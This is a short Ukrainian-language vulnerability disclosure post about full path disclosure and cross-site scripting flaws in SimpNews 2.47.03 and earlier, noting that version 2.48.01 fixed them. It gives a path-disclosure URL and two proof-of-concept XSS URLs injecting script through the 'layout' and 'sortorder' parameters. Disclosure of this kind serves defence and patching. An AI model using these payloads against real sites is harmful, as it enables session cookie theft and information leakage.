Уразливості в SimpNews
15:04 09.07.201029.05.2010
У жовтні, 26.10.2009, я знайшов Full path disclosure та Cross-Site Scripting уразливості в SimpNews. Дані уразливості я виявив на www.boesch-it.de - офіційному сайті веб додатку. Про що найближчим часом повідомлю розробникам. Які також є розробниками SimpGB.
Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб додатку.
09.07.2010
Full path disclosure:
http://site/simpnews/news.php?lang=1&layout=layout2&sortorder=0&category=1
XSS:
http://site/simpnews/news.php?layout=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/simpnews/news.php?lang=en&layout=layout2&sortorder=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Уразливі SimpNews V2.47.03 та попередні версії. В версії SimpNews V2.48.01 дані уразливості були виправлені.